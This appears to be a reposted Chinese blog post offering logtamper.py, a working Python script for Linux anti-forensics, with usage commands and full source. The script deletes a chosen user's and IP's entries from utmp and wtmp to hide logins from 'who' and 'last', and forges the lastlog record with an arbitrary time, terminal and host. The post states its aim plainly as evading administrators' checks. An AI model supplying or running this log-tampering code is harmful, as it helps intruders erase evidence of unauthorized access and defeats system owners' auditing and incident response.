我自仰头向天笑,笑完我就去睡觉,哈哈哈哈……

python修改linux日志(logtamper.py)

原作者原文:https://blog.csdn.net/qq_27446553/article/details/51434451

 

躲避管理员who查看

python logtamper.py -m 1 -u username -i 192.168.0.188

 

清除指定ip的登录日志

python logtamper.py -m 2 -u username -i 192.168.0.188

 

修改上次登录时间地点

python logtamper.py -m 3 -u username -i 192.168.0.188 -t tty1 -d 2014:05:28:10:11:12

 

这里对-m参数补充说明一下:

-m 操作的模式 固定值,3个可选【1/2/3】

分别是

1:修改当前登陆用户。日志文件:/var/log/wtmp 查看命令:
who
2:清除登陆日志。日志文件:/var/run/utmp 查看命令:
last | more
3、不是清除,是修改覆盖上次的登陆信息,要修改的用户为-u后面的参数,改为后面 -i -t -d的信息。所以,例如,想改root用户,则-u root,-i -t -d随便输入。日志文件:/var/log/lastlog 查看命令:
lastlog

 

源代码:

#!/usr/bin/env python
# -*- coding:utf-8 -*-
# mail: cn.b4dboy@gmail.com

import os, struct, sys
from pwd import getpwnam
from time import strptime, mktime
from optparse import OptionParser

UTMPFILE = "/var/run/utmp"
WTMPFILE = "/var/log/wtmp"
LASTLOGFILE = "/var/log/lastlog"

LAST_STRUCT = 'I32s256s'
LAST_STRUCT_SIZE = struct.calcsize(LAST_STRUCT)

XTMP_STRUCT = 'hi32s4s32s256shhiii4i20x'
XTMP_STRUCT_SIZE = struct.calcsize(XTMP_STRUCT)

def getXtmp(filename, username, hostname):
    xtmp = ''
    try:
        fp = open(filename, 'rb')
        while True:
            bytes = fp.read(XTMP_STRUCT_SIZE)
            if not bytes:
                break

            data = struct.unpack(XTMP_STRUCT, bytes)
            record = [(lambda s: str(s).split("\0", 1)[0])(i) for i in data]
            if (record[4] == username and record[5] == hostname):
                continue
            xtmp += bytes
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return xtmp

def modifyLast(filename, username, hostname, ttyname, strtime):
    try:
        p = getpwnam(username)
    except:
        showMessage('No such user.')

    timestamp = 0
    try:
        str2time = strptime(strtime, '%Y:%m:%d:%H:%M:%S')
        timestamp = int(mktime(str2time))
    except:
        showMessage('Time format err.')

    data = struct.pack(LAST_STRUCT, timestamp, ttyname, hostname)
    try:
        fp = open(filename, 'wb')
        fp.seek(LAST_STRUCT_SIZE * p.pw_uid)
        fp.write(data)
    except:
        showMessage('Cannot open file: %s' % filename)
    finally:
        fp.close()
    return True

def showMessage(msg):
    print msg
    exit(-1)

def saveFile(filename, contents):
    try:
        fp = open(filename, 'w+b')
        fp.write(contents)
    except IOError as e:
        showMessage(e)
    finally:
        fp.close()

if __name__ == '__main__':
    usage = 'usage: logtamper.py -m 2 -u b4dboy -i 192.168.0.188\n \
                    logtamper.py -m 3 -u b4dboy -i 192.168.0.188 -t tty1 -d 2015:05:28:10:11:12'
    parser = OptionParser(usage=usage)
    parser.add_option('-m', '--mode', dest='MODE', default='1' , help='1: utmp, 2: wtmp, 3: lastlog [default: 1]')
    parser.add_option('-t', '--ttyname', dest='TTYNAME')
    parser.add_option('-f', '--filename', dest='FILENAME')
    parser.add_option('-u', '--username', dest='USERNAME')
    parser.add_option('-i', '--hostname', dest='HOSTNAME')
    parser.add_option('-d', '--dateline', dest='DATELINE')
    (options, args) = parser.parse_args()

    if len(args) < 3:
        if options.MODE == '1':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = UTMPFILE

            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)

        elif options.MODE == '2':
            if options.USERNAME == None or options.HOSTNAME == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = WTMPFILE

            # tamper
            newData = getXtmp(options.FILENAME, options.USERNAME, options.HOSTNAME)
            saveFile(options.FILENAME, newData)

        elif options.MODE == '3':
            if options.USERNAME == None or options.HOSTNAME == None or options.TTYNAME == None or options.DATELINE == None:
                showMessage('+[Warning]: Incorrect parameter.\n')

            if options.FILENAME == None:
                options.FILENAME = LASTLOGFILE

            # tamper
            modifyLast(options.FILENAME, options.USERNAME, options.HOSTNAME, options.TTYNAME , options.DATELINE)

        else:
            parser.print_help()

 

posted @ 2019-11-20 10:02  轻轻的烟雾  阅读(1032)  评论(0编辑  收藏  举报